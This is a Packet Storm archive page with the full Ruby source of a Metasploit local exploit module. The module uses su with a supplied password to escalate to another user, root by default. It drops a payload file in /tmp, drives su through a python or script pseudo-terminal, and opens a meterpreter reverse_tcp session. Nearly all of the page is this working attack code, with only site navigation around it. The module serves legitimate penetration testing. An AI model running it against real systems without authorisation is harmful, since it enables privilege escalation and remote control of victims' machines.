exploit the possibilities

Linux / Unix su Privilege Escalation

Linux / Unix su Privilege Escalation
Posted Oct 20, 2020
Authored by Gavin Youker | Site metasploit.com

This Metasploit module attempts to create a new login session by invoking the su command of a valid username and password. If the login is successful, a new session is created via the specified payload. Because su forces passwords to be passed over stdin, this module attempts to invoke a pseudo-terminal with python, python3, or script.

tags | exploit, python
MD5 | 9ca7ce56dad3e9758e96d3f376c0f96f

Linux / Unix su Privilege Escalation

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
include Msf::Post::Linux
include Msf::Post::Linux::System
include Msf::Post::Unix
include Msf::Post::File
include Msf::Exploit::FileDropper
include Msf::Exploit::EXE
prepend Msf::Exploit::Remote::AutoCheck

Rank = NormalRanking

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Login to Another User with Su on Linux / Unix Systems',
'Description' => %q{
This module attempts to create a new login session by
invoking the su command of a valid username and password.

If the login is successful, a new session is created via
the specified payload.

Because su forces passwords to be passed over stdin, this
module attempts to invoke a psuedo-terminal with python,
python3, or script.
},
'License' => MSF_LICENSE,
'Author' => 'Gavin Youker <youkergav@gmail.com>',
'DisclosureDate' => '1971-11-03',
'Platform' => ['linux', 'unix'],
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' => [
[
'Linux x86', {
'Arch' => ARCH_X86,
'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
}
],
[
'Linux x86_64', {
'Arch' => ARCH_X64,
'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
}
],
],
'DefaultTarget' => 0,
'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
'SessionTypes' => ['shell', 'meterpreter']
)
)

register_options([
OptString.new('USERNAME', [true, 'Username to authenticate with.', 'root']),
OptString.new('PASSWORD', [false, 'Password to authenticate with.'])
])

register_advanced_options([
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
])
end

# Main function to run the exploit.
def exploit
fail_with(Failure::NoAccess, 'username not found') unless user_exists(datastore['USERNAME'])

# Upload the payload and stager files.
print_status('Uploading payload to target')
payload_file = build_payload(generate_payload_exe, datastore['WritableDir'])

# Execute the payload.
print_status('Attempting to login with su')
exec_payload(datastore['USERNAME'], datastore['PASSWORD'], payload_file)
end

# Function to check if target is exploitable.
def check
# Make sure su is installed.
unless command_exists?('su')
vprint_error('su not found on target machine')
return CheckCode::Safe
end

# Make sure a program to run the exploit is installed.
prorgam = find_exec_program
unless prorgam
vprint_error('One of the following programs must be installed on target: python, python3, script')
return CheckCode::Safe
end

# Make sure script requirements are met.
if prorgam == 'script'
# Check for command dependencies.
commands = ['sh', 'sleep', 'echo', 'base64']
for command in commands
unless command_exists?(command)
vprint_error("The '#{command}' must be installed on target")
return CheckCode::Safe
end
end

# Check that the script program is apart of the util-linux package.
version = find_util_linux_verison
unless version
vprint_error("The 'script' program must be of the 'util-linux' package")
return CheckCode::Safe
end

# Check that util-linux in of a compatible version.
unless version >= Gem::Version.new('2.25')
vprint_error("The package 'util-linux' must be version 2.25 or higher")
return CheckCode::Safe
end
end

return CheckCode::Appears
end

# Function to build and write the payload.
def build_payload(contents, dir)
fail_with(Failure::NoAccess, "directory '#{dir}' is on a noexec mount point") if noexec?(dir)

filepath = "#{dir}/#{Rex::Text.rand_text_alpha(8)}"

write_file(filepath, contents)
chmod(filepath, 755)
register_files_for_cleanup(filepath)

return filepath
end

# Function to execute the payload through the stager.
def exec_payload(username, password, payload)
# Load the exploit based on avaliable options.
if password
program = find_exec_program
if ['python', 'python3'].include?(program)
vprint_status("Using '#{program}' to load exploit")

python = 'import os, pty, base64;'\
'read = lambda fd: os.read(fd, 1024);'\
"write = lambda fd: base64.b64decode('#{Rex::Text.encode_base64(password)}');"\
"command = 'su - #{username} -c #{payload}';"\
'os.close(0);'\
'pty.spawn(command.split(), read, write);'

command = "#{program} -c \"#{python}\""
elsif program == 'script'
vprint_status("Using 'script' to load exploit")
command = "sh -c 'sleep 1; echo #{Rex::Text.encode_base64(password)} | base64 -d' | script /dev/null -qc 'su - #{username} -c #{payload}'"
end
else
command = "su - #{username} -c #{payload}"
end

# Execute the exploit.
response = cmd_exec(command)

fail_with(Failure::NoAccess, 'invalid password') if response.to_s.include?('Authentication failure')
return true
end

def find_exec_program
return 'python' if command_exists?('python')
return 'python3' if command_exists?('python3')
return 'script' if command_exists?('script')

return false
end

# Function to check if the user exists.
def user_exists(username)
return get_users.any? { |user| user[:name] == username }
end

# Function to get util-linux version.
def find_util_linux_verison
response = cmd_exec('script -V')
match = response.match(/script from util-linux (?<version>\d.\d+(.\d+)?)/)

return false unless match

return Gem::Version.new(match[:version])
end
end
Login or Register to add favorites

File Archive:

November 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    2 Files
  • 2
    Nov 2nd
    9 Files
  • 3
    Nov 3rd
    15 Files
  • 4
    Nov 4th
    90 Files
  • 5
    Nov 5th
    22 Files
  • 6
    Nov 6th
    16 Files
  • 7
    Nov 7th
    1 Files
  • 8
    Nov 8th
    1 Files
  • 9
    Nov 9th
    40 Files
  • 10
    Nov 10th
    27 Files
  • 11
    Nov 11th
    28 Files
  • 12
    Nov 12th
    13 Files
  • 13
    Nov 13th
    18 Files
  • 14
    Nov 14th
    2 Files
  • 15
    Nov 15th
    2 Files
  • 16
    Nov 16th
    29 Files
  • 17
    Nov 17th
    15 Files
  • 18
    Nov 18th
    15 Files
  • 19
    Nov 19th
    21 Files
  • 20
    Nov 20th
    16 Files
  • 21
    Nov 21st
    1 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    19 Files
  • 24
    Nov 24th
    32 Files
  • 25
    Nov 25th
    9 Files
  • 26
    Nov 26th
    11 Files
  • 27
    Nov 27th
    15 Files
  • 28
    Nov 28th
    9 Files
  • 29
    Nov 29th
    2 Files
  • 30
    Nov 30th
    17 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close